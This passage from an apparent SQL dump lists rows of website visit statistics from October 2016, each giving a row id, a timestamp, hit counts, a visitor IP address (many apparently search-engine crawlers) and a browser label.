ther'),(69476,1476988665,1,1,0,0,'94.179.4.103','firefox'),(69477,1476988844,1,1,0,0,'157.55.39.97','other'),(69478,1476989648,1,0,1,0,'66.249.64.24',''),(69479,1476989726,1,1,0,0,'174.129.237.157','other'),(69480,1476989843,1,1,0,0,'92.113.156.177','chrome'),(69481,1476990476,1,1,0,0,'163.172.66.81','other'),(69482,1476991058,1,1,0,0,'163.172.65.189','other'),(69483,1476991481,1,1,0,0,'163.172.66.172','other'),(69484,1476992083,1,1,0,0,'163.172.66.160','other'),(69485,1476992842,1,1,0,0,'164.132.161.81','other'),(69486,1476993207,2,0,2,0,'66.249.64.24',''),(69487,1476993225,1,1,0,0,'51.255.65.52','other'),(69488,1476993602,1,1,0,0,'163.172.66.87','other'),(69489,1476993785,1,0,1,0,'66.249.64.21',''),(69490,1476993787,1,0,1,0,'66.249.64.27',''),(69491,1476993977,1,1,0,0,'163.172.66.179','other'),(69492,1476994009,1,1,0,0,'130.193.51.19','other'),(69493,1476994129,1,0,1,0,'66.249.64.24',''),(69494,1476994172,1,1,0,0,'164.132.161.61','other'),(69495,1476994347,1,1,0,0,'141.8.142.58','other'),(69496,1476994594,1,1,0,0,'51.255.65.80','other'),(69497,1476994617,1,1,0,0,'66.249.64.27','chrome'),(69498,1476994770,1,1,0,0,'66.249.64.69','chrome'),(69499,1476994904,1,1,0,0,'51.255.65.4','other'),(69500,1476995183,1,1,0,0,'163.172.66.93','other'),(69501,1476996001,1,1,0,0,'51.255.65.84','other'),(69502,1476996522,1,1,0,0,'163.172.66.45','other'),(69503,1476996778,1,1,0,0,'178.255.215.94','other'),(69504,1476996989,1,1,0,0,'141.0.13.242','other'),(69505,1476997254,1,1,0,0,'66.102.9.27','other'),(69506,1476997328,1,1,0,0,'163.172.66.158','other'),(69507,1476998151,1,1,0,0,'163.172.66.151','other'),(69508,1476998464,1,0,1,0,'66.249.64.24',''),(69509,1476998565,1,1,0,0,'164.132.161.49','other'),(69510,1476999056,1,1,0,0,'163.172.64.177','other'),(69511,1476999354,1,1,0,0,'163.172.64.185','other'),(69512,1477000182,1,1,0,0,'163.172.65.24','other'),(69513,1477000379,1,1,0,0,'163.172.64.250','other'),(69514,1477000791,1,1,0,0,'163.172.66.31','other'),(69515,1477001443,1,1,0,0,'141.8.183.25','other'),(69516,1477003078,1,0,1,0,'66.249.64.27',''),(69517,1477003286,2,2,0,0,'51.255.65.28','other'),(69518,1477003375,1,1,0,0,'164.132.161.73','other'),(69519,1477003387,1,1,0,0,'51.255.65.97','other'),(69520,1477004314,1,1,0,0,'164.132.161.63','other'),(69521,1477004352,1,0,1,0,'66.249.64.79',''),(69522,1477004838,1,1,0,0,'164.132.161.55','other'),(69523,1477004855,1,0,1,0,'66.249.64.24',''),(69524,1477004907,1,1,0,0,'141.8.183.25','other'),(69525,1477004910,1,1,0,0,'40.77.167.53','other'),(69526,1477004965,1,1,0,0,'163.172.66.44','other'),(69527,1477005107,1,1,0,0,'163.172.65.118','other'),(69528,1477005605,1,1,0,0,'163.172.64.188','other'),(69529,1477005612,1,1,0,0,'163.172.64.193','other'),(69530,1477006004,1,1,0,0,'163.172.65.39','other'),(69531,1477006265,1,1,0,0,'51.255.65.76','other'),(69532,1477006757,3,0,3,0,'66.249.64.74',''),(69533,1477006799,1,1,0,0,'164.132.161.38','other'),(69534,1477007099,1,1,0,0,'130.193.51.19','other'),(69535,1477007302,1,1,0,0,'91.196.178.103','other'),(69536,1477007339,1,1,0,0,'180.76.15.136','other'),(69537,1477007490,1,0,1,0,'66.249.64.21',''),(69538,1477009096,1,1,0,0,'164.132.161.77','other'),(69539,1477009364,1,1,0,0,'164.132.161.72','other'),(69540,1477009579,1,1,0,0,'130.193.50.34','other'),(69541,1477009985,1,1,0,0,'141.8.183.25','other'),(69542,1477010578,1,1,0,0,'163.172.64.234','other'),(69543,1477010837,1,1,0,0,'180.76.15.18','other'),(69544,1477010929,1,1,0,0,'164.132.161.78','other'),(69545,1477011551,1,1,0,0,'66.102.9.27','other'),(69546,1477011632,1,0,1,0,'66.249.64.27',''),(69547,1477011664,1,1,0,0,'207.46.13.123','other'),(69548,1477012117,1,0,1,0,'66.249.64.21',''),(69549,1477013102,1,1,0,0,'51.255.65.12','other'),(69550,1477014184,1,1,0,0,'163.172.65.216','other'),(69551,1477015247,1,1,0,0,'163.172.66.31','other'),(69552,1477016386,1,0,1,0,'66.249.64.21',''),(69553,1477016446,1,1,0,0,'163.172.66.60','other'),(69554,1477016764,1,1,0,0,'51.255.65.7','other'),(69555,1477017096,1,1,0,0,'164.132.161.43','other'),(69556,1477017978,1,1,0,0,'163.172.66.154','other'),(69557,1477018652,1,1,0,0,'130.193.50.34','other'),(69558,1477018923,1,1,0,0,'195.154.241.173','chrome'),(69559,1477019635,1,1,0,0,'164.132.161.84','other'),(69560,1477020735,1,0,1,0,'66.249.64.27',''),(69561,1477021624,1,1,0,0,'130.193.50.34','other'),(69562,1477021739,1,1,0,0,'141.8.183.25','other'),(69563,1477023250,1,1,0,0,'8.37.232.79','other'),(69564,1477023272,1,1,0,0,'141.8.142.58','other'),(69565,1477024632,1,1,0,0,'141.8.142.58','other'),(69566,1477024635,1,1,0,0,'141.8.183.25','other'),(69567,1477025559,1,0,1,0,'66.249.64.27',''),(69568,1477025967,1,1,0,0,'66.102.9.25','other'),(69569,1477026332,1,0,1,0,'66.249.64.24',''),(69570,1477026507,1,0,1,0,'66.249.64.21',''),(69571,1477027297,1,1,0,0,'130.193.51.19','other'),(69572,1477027300,1,1,0,0,'141.8.142.58','other'),(69573,1477027937,1,1,0,0,'91.196.178.68','chrome'),(69574,1477027938,1,1,0,0,'91.196.178.71','firefox'),(69575,1477029193,1,1,0,0,'93.171.243.148','firefox'),(69576,1477030071,1,1,0,0,'91.196.178.70','firefox'),(69577,1477030126,1,1,0,0,'91.196.178.68','chrome'),(69578,1477030376,1,1,0,0,'130.193.50.34','other'),(69579,1477030419,1,1,0,0,'141.8.142.61','other'),(69580,1477030423,1,1,0,0,'178.154.149.10','other'),(69581,1477031199,2,2,0,0,'91.196.178.162','chrome'),(69582,1477031798,1,1,0,0,'91.196.178.70','firefox'),(69583,1477031935,1,1,0,0,'91.196.178.68','chrome'),(69584,1477032530,1,1,0,0,'66.102.9.25','chrome'),(69585,1477033204,1,1,0,0,'37.52.20.85','chrome'),(69586,1477033254,1,1,0,0,'66.102.9.29','other'),(69587,1477033473,1,0,1,0,'66.249.64.21',''),(69588,1477033530,1,1,0,0,'91.196.178.70','firefox'),(69589,1477033533,1,1,0,0,'37.55.240.123','opera'),(69590,1477033535,1,1,0,0,'37.52.20.85','firefox'),(69591,1477033976,2,2,0,0,'46.219.33.141','firefox'),(69592,1477034485,1,1,0,0,'91.196.178.70','chrome'),(69593,1477034514,1,1,0,0,'95.135.88.203','chrome'),(69594,1477034832,1,1,0,0,'37.52.129.207','chrome'),(69595,1477034976,1,1,0,0,'192.162.135.174','chrome'),(69596,1477035202,1,1,0,0,'94.179.7.17','firefox'),(69597,1477035203,1,1,0,0,'40.77.167.6','other'),(69598,1477035209,1,0,1,0,'66.249.64.24',''),(69599,1477035850,1,1,0,0,'163.172.66.108','other'),(69600,1477036029,1,1,0,0,'163.172.66.136','other'),(69601,1477036119,1,1,0,0,'164.132.161.79','other'),(69602,1477036865,1,1,0,0,'46.219.242.223','firefox'),(69603,1477038252,1,1,0,0,'62.221.75.114','chrome'),(69604,1477038343,1,1,0,0,'46.219.242.223','firefox'),(69605,1477038389,1,0,1,0,'66.249.64.24',''),(69606,1477038686,1,1,0,0,'40.77.167.53','other'),(69607,1477040040,1,1,0,0,'51.255.65.24','other'),(69608,1477040317,2,1,1,0,'62.210.83.88',''),(69609,1477040481,1,1,0,0,'51.255.65.11','other'),(69610,1477041068,1,1,0,0,'163.172.65.198','other'),(69611,1477042101,1,1,0,0,'164.132.161.45','other'),(69612,1477042306,1,1,0,0,'51.255.65.66','other'),(69613,1477042402,1,1,0,0,'91.196.178.72','chrome'),(69614,1477042836,1,1,0,0,'163.172.66.154','other'),(69615,1477043057,1,1,0,0,'94.179.209.79','firefox'),(69616,1477043295,1,1,0,0,'163.172.66.19','other'),(69617,1477043702,1,1,0,0,'91.196.178.66','firefox'),(69618,1477043741,1,1,0,0,'164.132.161.11','other'),(69619,1477044026,1,1,0,0,'91.196.178.71','firefox'),(69620,1477044182,1,0,1,0,'66.249.64.24',''),(69621,1477044207,1,1,0,0,'141.8.142.61','other'),(69622,1477044260,1,1,0,0,'163.172.64.251','other'),(69623,1477044374,1,1,0,0,'207.46.13.123','other'),(69624,1477044786,1,1,0,0,'195.49.151.89','chrome'),(69625,1477044848,1,1,0,0,'91.196.178.66','firefox'),(69626,1477044894,1,1,0,0,'164.132.161.91','other'),(69627,1477044922,1,1,0,0,'91.196.178.38','firefox'),(69628,1477045398,1,0,1,0,'66.249.64.24',''),(69629,1477045785,1,1,0,0,'141.8.142.67','other'),(69630,1477045786,1,1,0,0,'141.8.183.25','other'),(69631,1477045788,2,2,0,0,'130.193.50.34','other'),(69632,1477045789,1,1,0,0,'93.158.152.46','other'),(69633,1477045943,2,2,0,0,'141.8.183.19','other'),(69634,1477045947,1,1,0,0,'130.193.51.14','other'),(69635,1477045952,1,1,0,0,'5.255.253.47','other'),(69636,1477045955,1,1,0,0,'178.154.189.6','other'),(69637,1477045958,2,2,0,0,'178.154.149.10','other'),(69638,1477045962,1,1,0,0,'130.193.50.32','other'),(69639,1477045965,1,1,0,0,'141.8.142.61','other'),(69640,1477045969,2,2,0,0,'130.193.37.7','other'),(69641,1477045972,2,2,0,0,'141.8.132.79','other'),(69642,1477045976,1,1,0,0,'130.193.50.6','other'),(69643,1477045979,1,1,0,0,'93.158.152.51','other'),(69644,1477045982,1,1,0,0,'130.193.51.19','other'),(69645,1477045990,1,1,0,0,'5.255.253.10','other'),(69646,1477046178,1,1,0,0,'130.193.50.4','other'),(69647,1477046214,1,1,0,0,'141.8.183.14','other'),(69648,1477046300,1,0,1,0,'66.249.64.69',''),(69649,1477046432,1,1,0,0,'91.196.178.72','chrome'),(69650,1477046486,1,0,1,0,'66.249.64.79',''),(69651,1477046659,1,1,0,0,'66.249.64.24','chrome'),(69652,1477047111,1,1,0,0,'130.193.50.34','other'),(69653,1477047197,1,1,0,0,'130.180.217.32','firefox'),(69654,1477047612,1,1,0,0,'163.172.66.36','other'),(69655,1477047860,1,1,0,0,'91.196.178.72','chrome'),(69656,1477048371,1,0,1,0,'66.249.64.21',''),(69657,1477048388,1,1,0,0,'141.8.142.58','other'),(69658,1477048431,1,1,0,0,'91.196.178.163','chrome'),(69659,1477048553,1,1,0,0,'5.255.253.54','other'),(69660,1477049374,1,0,1,0,'66.249.64.27',''),(69661,1477049517,1,1,0,0,'130.193.51.19','other'),(69662,1477049602,1,1,0,0,'130.193.50.34','other'),(69663,1477049734,1,1,0,0,'163.172.66.152','other'),(69664,1477049839,1,1,0,0,'91.196.178.168','chrome'),(69665,1477050027,2,2,0,0,'141.8.142.61','other'),(69666,1477050060,1,1,0,0,'51.255.65.21','other'),(69667,1477050408,3,3,0,0,'91.196.178.70','firefox'),(69668,1477050673,1,0,1,0,'66.249.64.27',''),(69669,1477051277,1,1,0,0,'130.193.50.34','other'),(69670,1477051369,1,1,0,0,'141.8.142.58','other'),(69671,1477051384,1,1,0,0,'78.111.185.90','chrome'),(69672,1477051595,1,1,0,0,'157.55.39.97','other'),(69673,1477051648,1,1,0,0,'66.249.64.27','chrome'),(69674,1477051986,1,1,0,0,'82.207.26.224','firefox'),(69675,1477052345,1,1,0,0,'178.95.30.241','chrome'),(69676,1477052542,5,5,0,0,'199.58.86.209','other'),(69677,1477052651,1,1,0,0,'141.8.183.25','other'),(69678,1477052845,1,1,0,0,'5.255.253.67','other'),(69679,1477053988,1,1,0,0,'130.193.50.34','other'),(69680,1477054036,1,1,0,0,'82.145.222.250','other'),(69681,1477054044,1,1,0,0,'40.77.167.53','other'),(69682,1477054101,1,1,0,0,'212.1.108.150','firefox'),(69683,1477055266,1,1,0,0,'66.102.9.29','other'),(69684,1477055441,1,1,0,0,'91.196.178.70','chrome'),(69685,1477056758,1,0,1,0,'66.249.64.21',''),(69686,1477057815,1,1,0,0,'40.77.167.53','other'),(69687,1477057833,2,0,2,0,'66.249.64.24',''),(69688,1477058243,1,1,0,0,'163.172.66.96','other'),(69689,1477058711,1,1,0,0,'91.196.178.163','chrome'),(69690,1477060058,1,1,0,0,'163.172.66.133','other'),(69691,1477060401,1,1,0,0,'164.132.161.86','other'),(69692,1477060981,1,0,1,0,'66.249.64.21',''),(69693,1477061230,10,10,0,0,'69.58.178.57','firefox'),(69694,1477061781,1,1,0,0,'163.172.65.2','other'),(69695,1477061878,1,1,0,0,'45.34.162.196','chrome'),(69696,1477061900,1,1,0,0,'51.255.65.64','other'),(69697,1477062225,1,1,0,0,'164.132.161.32','other'),(69698,1477062243,1,1,0,0,'51.255.65.32','other'),(69699,1477062812,2,2,0,0,'130.193.50.34','other'),(69700,1477063590,1,1,0,0,'51.255.65.6','other'),(69701,1477063764,1,1,0,0,'91.196.178.168','chrome'),(69702,1477065168,1,1,0,0,'51.255.65.78','other'),(69703,1477065385,1,1,0,0,'51.255.65.6','other'),(69704,1477065825,1,0,1,0,'66.249.64.24',''),(69705,1477066104,1,1,0,0,'163.172.64.252','other'),(69706,1477066299,1,1,0,0,'51.255.65.47','other'),(69707,1477066561,1,1,0,0,'93.158.152.84','other'),(69708,1477067297,1,1,0,0,'91.196.178.168','other'),(69709,1477067387,1,0,1,0,'66.249.64.24',''),(69710,1477067406,1,1,0,0,'207.46.13.123','other'),(69711,1477067480,1,1,0,0,'163.172.66.170','other'),(69712,1477067486,1,1,0,0,'91.196.178.161','chrome'),(69713,1477067634,1,1,0,0,'82.145.220.119','chrome'),(69714,1477068053,1,1,0,0,'94.179.42.235','chrome'),(69715,1477068505,1,1,0,0,'178.93.148.18','chrome'),(69716,1477068722,1,0,1,0,'66.249.64.21',''),(69717,1477068841,2,0,2,0,'66.249.64.27',''),(69718,1477069346,1,0,1,0,'66.249.64.24',''),(69719,1477069484,1,1,0,0,'178.93.148.18','chrome'),(69720,1477069676,1,1,0,0,'66.102.9.27','other'),(69721,1477070045,1,0,1,0,'66.249.64.27',''),(69722,1477070326,1,1,0,0,'91.196.178.168','other'),(69723,1477070846,1,1,0,0,'91.196.178.72','firefox'),(69724,1477071704,2,2,0,0,'130.193.50.34','other'),(69725,1477071871,1,1,0,0,'163.172.64.179','other'),(69726,1477072734,1,1,0,0,'163.172.66.4','other'),(69727,1477073388,1,1,0,0,'163.172.66.66','other'),(69728,1477073478,1,1,0,0,'91.196.178.103','chrome'),(69729,1477074104,1,0,1,0,'66.249.64.79',''),(69730,1477075236,1,1,0,0,'164.132.161.70','other'),(69731,1477075516,1,0,1,0,'66.249.64.79',''),(69732,1477076728,1,1,0,0,'51.255.65.90','other'),(69733,1477077100,1,1,0,0,'94.179.85.218','firefox'),(69734,1477078227,1,1,0,0,'163.172.66.14','other'),(69735,1477078595,1,1,0,0,'66.102.9.25','other'),(69736,1477078799,1,1,0,0,'51.255.65.28','other'),(69737,1477078991,1,1,0,0,'66.102.9.25','chrome'),(69738,1477079319,1,1,0,0,'51.255.65.78','other'),(69739,1477080036,1,0,1,0,'66.249.64.24',''),(69740,1477080747,1,0,1,0,'66.249.64.21',''),(69741,1477080875,1,1,0,0,'51.255.65.65','other'),(69742,1477081010,1,1,0,0,'51.255.65.40','other'),(69743,1477081814,1,1,0,0,'163.172.65.7','other'),(69744,1477082158,1,1,0,0,'164.132.161.68','other'),(69745,1477082232,1,0,1,0,'66.249.64.21',''),(69746,1477082743,1,1,0,0,'164.132.161.66','other'),(69747,1477083455,1,1,0,0,'163.172.66.94','other'),(69748,1477084318,1,1,0,0,'51.255.65.7','other'),(69749,1477084962,1,1,0,0,'66.249.64.21','chrome'),(69750,1477085893,1,1,0,0,'164.132.161.83','other'),(69751,1477085969,1,0,1,0,'66.249.64.27',''),(69752,1477086127,1,1,0,0,'163.172.64.177','other'),(69753,1477086696,1,0,1,0,'66.249.64.21',''),(69754,1477087169,1,1,0,0,'163.172.66.133','other'),(69755,1477088984,1,1,0,0,'163.172.66.103','other'),(69756,1477089131,1,1,0,0,'51.255.65.32','other'),(69757,1477089475,1,1,0,0,'141.8.183.25','other'),(69758,1477090019,1,0,1,0,'66.249.64.24',''),(69759,1477091282,1,1,0,0,'157.55.39.97','other'),(69760,1477091405,1,0,1,0,'66.249.64.79',''),(69761,1477092257,1,1,0,0,'163.172.65.114','other'),(69762,1477092719,1,1,0,0,'141.8.183.25','other'),(69763,1477092722,1,1,0,0,'130.193.51.19','other'),(69764,1477092805,1,1,0,0,'51.255.65.84','other'),(69765,1477092967,1,1,0,0,'5.3.148.235','msie'),(69766,1477093021,1,1,0,0,'66.102.9.27','other'),(69767,1477093223,1,1,0,0,'164.132.161.29','other'),(69768,1477094602,1,1,0,0,'163.172.64.184','other'),(69769,1477096234,1,1,0,0,'163.172.65.234','other'),(69770,1477096664,1,1,0,0,'163.172.65.48','other'),(69771,1477097309,1,0,1,0,'66.249.64.21',''),(69772,1477097455,2,2,0,0,'66.249.64.24','chrome'),(69773,1477097476,1,1,0,0,'163.172.66.140','other'),(69774,1477097692,1,1,0,0,'51.255.65.45','other'),(69775,1477097985,1,1,0,0,'66.249.64.27','chrome'),(69776,1477098324,1,1,0,0,'51.255.65.49','other'),(69777,1477099798,1,1,0,0,'163.172.66.93','other'),(69778,1477100329,1,1,0,0,'163.172.66.19','other'),(69779,1477101287,42,42,0,0,'117.30.159.194','other'),(69780,1477101484,1,1,0,0,'163.172.66.164','other'),(69781,1477101899,4,4,0,0,'85.14.244.113','other'),(69782,1477101901,6,6,0,0,'85.14.244.98','other'),(69783,1477101908,4,4,0,0,'193.111.140.106','other'),(69784,1477103905,1,1,0,0,'51.255.65.75','other'),(69785,1477104717,1,0,1,0,'66.249.64.24',''),(69786,1477104797,1,0,1,0,'66.249.64.27',''),(69787,1477106946,1,0,1,0,'66.249.64.27',''),(69788,1477107304,1,1,0,0,'163.172.66.77','other'),(69789,1477107598,1,1,0,0,'66.102.9.25','other'),(69790,1477107869,10,0,10,0,'68.180.229.27',''),(69791,1477108525,1,1,0,0,'141.8.142.61','other'),(69792,1477109130,1,0,1,0,'66.249.64.21',''),(69793,1477109472,1,1,0,0,'163.172.65.62','other'),(69794,1477109893,1,1,0,0,'164.132.161.95','other'),(69795,1477110634,1,0,1,0,'68.180.229.27',''),(69796,1477112112,1,0,1,0,'66.249.64.27',''),(69797,1477112418,1,1,0,0,'130.193.50.34','other'),(69798,1477113745,2,2,0,0,'130.193.51.19','other'),(69799,1477114415,1,1,0,0,'141.8.142.61','other'),(69800,1477115214,2,0,2,0,'66.249.64.21',''),(69801,1477116031,1,1,0,0,'163.172.65.15','other'),(69802,1477116402,1,1,0,0,'94.179.64.205','chrome'),(69803,1477117454,1,1,0,0,'141.8.142.58','other'),(69804,1477118145,2,2,0,0,'95.213.141.126','opera'),(69805,1477118232,1,1,0,0,'2.92.32.107','opera'),(69806,1477118273,1,1,0,0,'180.76.15.162','other'),(69807,1477119156,1,1,0,0,'51.255.65.39','other'),(69808,1477119392,1,1,0,0,'164.132.161.18','other'),(69809,1477120110,1,1,0,0,'130.193.51.19','other'),(69810,1477120179,1,0,1,0,'66.249.64.27',''),(69811,1477121901,1,0,1,0,'68.180.229.27',''),(69812,1477122061,1,1,0,0,'66.102.9.29','other'),(69813,1477122503,1,1,0,0,'163.172.66.87','other'),(69814,1477123326,1,1,0,0,'163.172.66.133','other'),(69815,1477123352,1,1,0,0,'141.8.183.25','other'),(69816,1477123920,1,0,1,0,'66.249.64.24',''),(69817,1477124166,1,1,0,0,'51.255.65.31','other'),(69818,1477126422,1,1,0,0,'130.193.50.34','other'),(69819,1477126545,1,1,0,0,'207.46.13.123','other'),(69820,1477126577,1,1,0,0,'163.172.64.181','other'),(69821,1477127023,1,1,0,0,'66.249.64.21','chrome'),(69822,1477127512,1,0,1,0,'66.249.64.79',''),(69823,1477127786,1,1,0,0,'164.132.161.76','other'),(69824,1477127839,1,1,0,0,'163.172.66.164','other'),(69825,1477129353,1,1,0,0,'141.8.142.25','other'),(69826,1477129609,1,1,0,0,'91.196.178.166','chrome'),(69827,1477131055,1,0,1,0,'66.249.64.21',''),(69828,1477131250,1,0,1,0,'66.249.64.27',''),(69829,1477132317,1,1,0,0,'93.158.152.84','other'),(69830,1477132849,1,1,0,0,'163.172.66.96','other'),(69831,1477133767,1,1,0,0,'163.172.66.22','other'),(69832,1477134396,2,0,2,0,'66.249.64.24',''),(69833,1477134928,1,1,0,0,'164.132.161.64','other'),(69834,1477134965,1,1,0,0,'164.132.161.44','other'),(69835,1477134983,1,1,0,0,'40.77.167.6','other'),(69836,1477135132,1,1,0,0,'164.132.161.42','other'),(69837,1477135370,1,1,0,0,'164.132.161.48','other'),(69838,1477135689,1,0,1,0,'66.249.64.27',''),(69839,1477136562,1,1,0,0,'66.102.9.25','other'),(69840,1477136908,1,1,0,0,'207.46.13.56','other'),(69841,1477138050,1,1,0,0,'141.8.132.10','other'),(69842,1477138054,1,1,0,0,'141.8.142.67','other'),(69843,1477139029,1,1,0,0,'141.8.183.25','other'),(69844,1477139080,1,1,0,0,'163.172.66.18','other'),(69845,1477139197,1,1,0,0,'51.255.65.50','other'),(69846,1477139324,1,0,1,0,'66.249.64.24',''),(69847,1477140186,1,1,0,0,'51.255.65.71','other'),(69848,1477140355,1,1,0,0,'93.158.152.84','other'),(69849,1477140603,1,0,1,0,'68.180.229.190',''),(69850,1477140649,1,1,0,0,'130.193.50.34','other'),(69851,1477140653,1,1,0,0,'141.8.142.58','other'),(69852,1477142296,2,2,0,0,'66.249.64.21','chrome'),(69853,1477142605,2,2,0,0,'66.249.64.27','chrome'),(69854,1477143693,1,1,0,0,'180.76.15.156','other'),(69855,1477143931,2,2,0,0,'141.8.183.25','other'),(69856,1477144592,2,2,0,0,'66.249.64.21','chrome'),(69857,1477144726,3,3,0,0,'66.249.64.24','chrome'),(69858,1477145061,1,1,0,0,'164.132.161.84','other'),(69859,1477145512,1,0,1,0,'66.249.64.27',''),(69860,1477146680,1,1,0,0,'164.132.161.45','other'),(69861,1477147275,1,1,0,0,'130.193.51.19','other'),(69862,1477147382,8,8,0,0,'176.9.131.69','other'),(69863,1477147489,1,1,0,0,'130.193.37.7','other'),(69864,1477147493,1,1,0,0,'141.8.142.85','other'),(69865,1477148014,1,0,1,0,'66.249.64.21',''),(69866,1477148707,1,0,1,0,'66.249.64.27',''),(69867,1477149346,1,1,0,0,'163.172.65.125','other'),(69868,1477149519,1,1,0,0,'207.46.13.123','other'),(69869,1477150054,1,1,0,0,'141.8.132.41','other'),(69870,1477150141,1,1,0,0,'94.179.209.79','firefox'),(69871,1477150288,1,1,0,0,'93.158.152.46','other'),(69872,1477150303,1,1,0,0,'163.172.65.198','other'),(69873,1477150711,1,1,0,0,'66.102.9.27','other'),(69874,1477152003,1,0,1,0,'68.180.230.220',''),(69875,1477152140,1,1,0,0,'51.255.65.58','other'),(69876,1477153316,1,0,1,0,'66.249.64.24',''),(69877,1477153349,1,0,1,0,'66.249.64.27',''),(69878,1477153496,1,0,1,0,'66.249.64.21',''),(69879,1477153659,1,1,0,0,'40.77.167.6','other'),(69880,1477154080,1,1,0,0,'164.132.161.74','other'),(69881,1477154217,1,1,0,0,'5.255.253.47','other'),(69882,1477154890,1,1,0,0,'130.193.51.19','other'),(69883,1477155140,1,1,0,0,'204.79.180.245','msie'),(69884,1477155922,1,1,0,0,'51.255.65.30','other'),(69885,1477155977,1,1,0,0,'46.211.136.64','chrome'),(69886,1477156135,4,4,0,0,'91.200.12.155','msie'),(69887,1477156423,1,1,0,0,'66.102.9.27','chrome'),(69888,1477157121,1,1,0,0,'189.89.125.52','firefox'),(69889,1477157396,1,1,0,0,'66.249.64.27','chrome'),(69890,1477157426,2,0,2,0,'66.249.64.21',''),(69891,1477158168,2,2,0,0,'130.193.50.34','other'),(69892,1477159498,1,1,0,0,'130.193.50.34','other'),(69893,1477159536,1,1,0,0,'180.76.15.34','other'),(69894,1477160383,1,1,0,0,'176.8.245.195','chrome'),(69895,1477160675,1,1,0,0,'164.132.161.35','other'),(69896,1477161010,1,1,0,0,'163.172.65.220','other'),(69897,1477161214,2,2,0,0,'130.193.50.34','other'),(69898,1477163464,1,1,0,0,'91.196.178.66','other'),(69899,1477163741,1,1,0,0,'164.132.161.39','other'),(69900,1477163805,1,1,0,0,'66.249.64.27','chrome'),(69901,1477164404,1,1,0,0,'130.193.50.34','other'),(69902,1477164408,1,1,0,0,'130.193.51.19','other'),(69903,1477164609,1,1,0,0,'164.132.161.94','other'),(69904,1477164754,1,1,0,0,'91.196.178.66','other'),(69905,1477165111,1,1,0,0,'66.102.9.27','other'),(69906,1477165137,1,1,0,0,'174.129.237.157','other'),(69907,1477165398,1,1,0,0,'207.46.13.56','other'),(69908,1477165830,2,2,0,0,'141.8.142.67','other'),(69909,1477165866,1,1,0,0,'164.132.161.49','other'),(69910,1477165870,2,2,0,0,'141.8.183.25','other'),(69911,1477165878,1,1,0,0,'130.193.50.34','other'),(69912,1477166264,1,1,0,0,'66.249.64.24','chrome'),(69913,1477167072,1,1,0,0,'207.46.13.115','other'),(69914,1477167152,1,1,0,0,'141.8.183.25','other'),(69915,1477168078,1,1,0,0,'130.193.50.34','other'),(69916,1477168503,1,1,0,0,'141.8.183.25','other'),(69917,1477168764,2,0,2,0,'66.249.64.21',''),(69918,1477168873,1,1,0,0,'40.77.167.6','other'),(69919,1477169052,1,1,0,0,'130.193.50.34','other'),(69920,1477170359,1,0,1,0,'66.249.64.27',''),(69921,1477170518,1,1,0,0,'163.172.65.193','other'),(69922,1477170848,1,1,0,0,'141.8.183.25','other'),(69923,1477171062,1,1,0,0,'130.193.50.34','other'),(69924,1477172401,1,1,0,0,'51.255.65.38','other'),(69925,1477172444,1,1,0,0,'163.172.66.61','other'),(69926,1477172482,1,1,0,0,'164.132.161.91','other'),(69927,1477173404,1,1,0,0,'164.132.161.69','other'),(69928,1477173935,1,1,0,0,'130.193.50.34','other'),(69929,1477175244,1,0,1,0,'66.249.64.24',''),(69930,1477175702,1,1,0,0,'163.172.65.229','other'),(69931,1477176297,2,0,2,0,'66.249.64.24',''),(69932,1477176404,1,0,1,0,'66.249.64.21',''),(69933,1477176866,1,1,0,0,'164.132.161.65','other'),(69934,1477177013,1,1,0,0,'130.193.50.34','other'),(69935,1477177017,1,1,0,0,'141.8.183.25','other'),(69936,1477177181,1,1,0,0,'163.172.65.22','other'),(69937,1477178051,1,1,0,0,'163.172.64.225','other'),(69938,1477178738,1,1,0,0,'164.132.161.14','other'),(69939,1477179659,1,1,0,0,'66.102.9.25','other'),(69940,1477179896,1,1,0,0,'141.8.142.58','other'),(69941,1477180183,1,1,0,0,'94.179.209.79','firefox'),(69942,1477180293,2,0,2,0,'66.249.64.21',''),(69943,1477180824,1,1,0,0,'51.255.65.35','other'),(69944,1477181740,1,1,0,0,'164.132.161.27','other'),(69945,1477182352,1,1,0,0,'141.8.142.62','other'),(69946,1477182697,1,1,0,0,'40.77.167.15','other'),(69947,1477183238,1,1,0,0,'163.172.66.149','other'),(69948,1477183971,2,1,1,0,'66.249.64.24',''),(69949,1477184185,1,1,0,0,'163.172.65.204','other'),(69950,1477184271,1,1,0,0,'66.249.64.74','chrome'),(69951,1477184332,1,1,0,0,'51.255.65.56','other'),(69952,1477184464,1,1,0,0,'163.172.66.113','other'),(69953,1477184550,2,0,2,0,'66.249.64.27',''),(69954,1477186104,1,1,0,0,'141.8.183.25','other'),(69955,1477186777,1,1,0,0,'164.132.161.81','other'),(69956,1477187199,1,1,0,0,'66.249.64.24','chrome'),(69957,1477187264,1,1,0,0,'164.132.161.22','other'),(69958,1477188074,1,1,0,0,'164.132.161.68','other'),(69959,1477188363,1,1,0,0,'51.255.65.50','other'),(69960,1477188759,1,1,0,0,'141.8.142.58','other'),(69961,1477188988,1,1,0,0,'51.255.65.5','other'),(69962,1477189151,1,1,0,0,'164.132.161.73','other'),(69963,1477189622,1,1,0,0,'164.132.161.60','other'),(69964,1477190885,1,1,0,0,'51.255.65.40','other'),(69965,1477191005,1,1,0,0,'164.132.161.71','other'),(69966,1477191372,1,0,1,0,'66.249.64.24',''),(69967,1477191413,1,1,0,0,'163.172.66.118','other'),(69968,1477191577,1,1,0,0,'5.255.253.53','other'),(69969,1477191597,1,1,0,0,'130.193.50.32','other'),(69970,1477192460,1,1,0,0,'130.193.51.19','other'),(69971,1477192595,1,1,0,0,'163.172.66.66','other'),(69972,1477193356,1,1,0,0,'163.172.65.43','other'),(69973,1477193648,1,0,1,0,'66.249.64.24',''),(69974,1477193664,1,1,0,0,'51.255.65.13','other'),(69975,1477194009,1,1,0,0,'66.102.9.29','other'),(69976,1477195099,1,0,1,0,'66.249.64.21',''),(69977,1477195205,1,0,1,0,'66.249.64.24',''),(69978,1477195501,1,1,0,0,'180.76.15.161','other'),(69979,1477195703,1,1,0,0,'130.193.50.34','other'),(69980,1477196221,2,0,2,0,'66.249.64.24',''),(69981,1477197850,1,0,1,0,'66.249.64.27',''),(69982,1477197963,1,1,0,0,'130.193.50.34','other'),(69983,1477198124,1,1,0,0,'51.255.65.15','other'),(69984,1477198405,1,1,0,0,'51.255.65.26','other'),(69985,1477198436,1,0,1,0,'66.249.64.21',''),(69986,1477198942,1,1,0,0,'66.102.9.27','other'),(69987,1477199889,1,1,0,0,'163.172.64.221','other'),(69988,1477201319,1,1,0,0,'164.132.161.52','other'),(69989,1477201403,1,1,0,0,'66.102.9.29','other'),(69990,1477201695,1,1,